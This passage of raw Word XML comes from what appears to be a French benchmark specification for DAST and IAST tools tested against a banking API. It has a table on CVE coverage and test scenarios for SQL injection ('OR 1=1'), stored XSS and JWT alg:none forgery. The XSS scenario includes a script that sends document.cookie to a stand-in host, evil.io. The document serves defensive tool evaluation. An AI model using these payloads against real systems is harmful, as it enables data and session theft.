        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Les CVE (Common Vulnerabilities and Exposures) identifient des vulnérabilités dans des composants tiers spécifiques (bibliothèques, frameworks, serveurs). Le DAST et l'IAST ne sont pas des outils SCA — leur couverture CVE est limitée et indirecte.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626"/>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Outil</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Couverture CVE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Limite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Complément requis</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Détection comportementale de vuln connues (ex : Log4Shell si le endpoint est vulnérable)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Ne scanne pas les JARs/packages — détecte les symptômes, pas la cause</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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SCA obligatoire (SDepend, Xray)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IAST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Peut détecter l'exploitation d'une lib vulnérable à l'exécution (taint tracking)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Dépend de la couverture des tests — si la lib n'est pas appelée, pas de détection</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SCA pour l'inventaire complet</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SCA/SDepend</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Inventaire exhaustif des CVE des dépendances + reachability</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Ne détecte pas les vuln applicatives (logique métier)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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DAST + IAST pour les vuln applicatives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single" w:color="1E6B3C" w:sz="1"/>
              <w:bottom w:val="single" w:color="1E6B3C" w:sz="1"/>
              <w:right w:val="single" w:color="1E6B3C" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D9EAD3"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Recommandation : exiger que les rapports DAST/IAST incluent systématiquement les champs CWE, OWASP API Top 10 et CVSS v3.1 pour chaque finding. La CVE ne doit être renseignée que si le finding est directement lié à un composant tiers identifié — sinon laisser vide plutôt que de mapper incorrectement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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11   Scénarios de Vulnérabilités — Exemples de Détection DAST &amp; IAST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Note importante : les scénarios ci-dessous sont des exemples illustratifs non exhaustifs. Ils servent de base de test lors du benchmark pour valider les capacités de détection des outils candidats. Les résultats attendus décrivent le comportement minimum requis — un outil peut détecter davantage. Chaque scénario précise le comportement attendu côté DAST (boîte noire, trafic HTTP) et côté IAST (boîte grise, exécution interne).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SCÉNARIO SC-01 — Injection SQL via paramètre API</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="A0C4F8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP API3:2023 / A03:2021  |  CWE-89</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Sévérité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1513"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="9C1B1B" w:sz="1"/>
              <w:left w:val="single" w:color="9C1B1B" w:sz="1"/>
              <w:bottom w:val="single" w:color="9C1B1B" w:sz="1"/>
              <w:right w:val="single" w:color="9C1B1B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F4CCCC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="9C1B1B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="22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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Une API de recherche de comptes bancaires construit sa requête SQL par concaténation directe du paramètre 'q' sans préparation de requête (prepared statement). L'attaquant injecte du SQL dans le paramètre pour extraire l'ensemble de la table utilisateurs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Diagramme de séquence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/accounts/search       Base de données</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GET /accounts/search │                        │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │  ?q=' OR '1'='1       │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SELECT * FROM accounts│</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │                       │  WHERE name='' OR '1'='1'</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   Tous les comptes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HTTP 200 — liste      │                        │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │  complète comptes      │                        │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │◀──────────────────────│                        │</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Requête HTTP brute — attaque DAST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GET /api/v1/accounts/search?q=%27+OR+%271%27%3D%271 HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Host: api.banking.internal</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Authorization: Bearer eyJhbGciOiJIUzI1NiJ9...</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Accept: application/json</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">X-Request-ID: dast-scan-001</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Réponse attendue si vulnérable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280F" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="110"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="110"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="56D364"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP/1.1 200 OK</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="56D364"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Content-Type: application/json</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="56D364"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="56D364"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">{</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="56D364"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "accounts": [</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="56D364"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    {"id":1,"owner":"Alice","iban":"FR76...","balance":12400.00},</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="56D364"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    {"id":2,"owner":"Bob","iban":"FR76...","balance":8750.00},</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="56D364"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    ... // TOUS les comptes retournés — fuite massive</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="56D364"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  ]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="56D364"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">}</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Résultat attendu — détection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444444"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Détecté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444444"/>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Le DAST détecte : (1) payload SQL dans le query param retourne plus de résultats qu'une requête normale ; (2) différence de comportement entre payload neutre et payload SQLi ; (3) pattern UNION/OR dans la réponse. Finding : CWE-89, API3:2023, CVSS 9.8.</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L'agent IAST trace le flux : source = HttpServletRequest.getParameter('q') → sink = Statement.execute() sans PreparedStatement. Détection du taint non sanitisé atteignant le sink SQL. Finding confirmé par exécution réelle, zéro FP.</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SCÉNARIO SC-02 — Cross-Site Scripting (XSS) Réfléchi</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="A0C4F8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP A03:2021  |  CWE-79</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Sévérité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1513"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="7F4F24" w:sz="1"/>
              <w:left w:val="single" w:color="7F4F24" w:sz="1"/>
              <w:bottom w:val="single" w:color="7F4F24" w:sz="1"/>
              <w:right w:val="single" w:color="7F4F24"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7F4F24"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="22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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Une API de messagerie interne retourne dans sa réponse JSON le contenu d'un champ 'message' sans encodage HTML. Ce contenu est ensuite rendu par le frontend Angular sans sanitization — un attaquant peut injecter du JavaScript exécuté dans le navigateur de la victime.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Diagramme de séquence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/messages        Frontend (victime)</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POST /messages │                      │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │  body: &lt;script&gt; │                      │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │  alert(doc.coo) │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201 Created    │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(victime lit)   │  GET /messages/42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200 + &lt;script&gt;...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JS exécuté ──────▶│ vol cookie/session</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Requête HTTP brute — injection du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POST /api/v1/messages HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Host: api.banking.internal</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Authorization: Bearer eyJhbGciOiJIUzI1NiJ9...</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Content-Type: application/json</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w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "recipient": "user@bank.fr",</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "subject": "Virement urgent",</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "body": "&lt;script&gt;fetch('https://evil.io/steal?c='+document.cookie)&lt;/script&gt;"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">}</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Résultat attendu — détection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444444"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Détecté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444444"/>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Le DAST soumet le payload XSS et vérifie si la balise &lt;script&gt; est retournée non encodée dans la réponse GET /messages/{id}. Détection par réflexion du payload dans la réponse. Finding : CWE-79, A03:2021. Limite DAST : ne peut pas confirmer l'exécution JS côté navigateur.</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L'agent IAST trace : source = RequestBody.body → sink = HttpServletResponse.write() sans encoding (HtmlUtils.htmlEscape absent). Détection du taint atteignant la sortie sans sanitization. Si le framework encode automatiquement, l'IAST ne remonte pas de FP.</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SCÉNARIO SC-03 — JWT — Signature absente (alg:none) &amp; Algorithme faible</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="A0C4F8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP API2:2023  |  CWE-347</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Sévérité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1513"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="9C1B1B" w:sz="1"/>
              <w:left w:val="single" w:color="9C1B1B" w:sz="1"/>
              <w:bottom w:val="single" w:color="9C1B1B" w:sz="1"/>
              <w:right w:val="single" w:color="9C1B1B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F4CCCC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="9C1B1B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="22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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">L'API accepte des JWT avec l'algorithme 'none' (pas de signature) ou avec HS256 et une clé triviale ('secret', 'password'). Un attaquant forge un token avec des claims arbitraires (rôle admin, ID utilisateur différent) sans connaître la clé secrète.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Diagramme de séquence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/admin/users</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Décode JWT légitime   │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │  Modifie role:admin    │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │  Supprime signature    │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │  (alg:none)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GET /admin/users      │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │  Authorization: Bearer │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │  &lt;JWT forgé alg:none&gt;  │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │───────────────────────▶│</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │                        │  Vérifie alg:none</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │                        │  → accepté sans vérif.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │  HTTP 200              │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │  Liste tous les users  │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
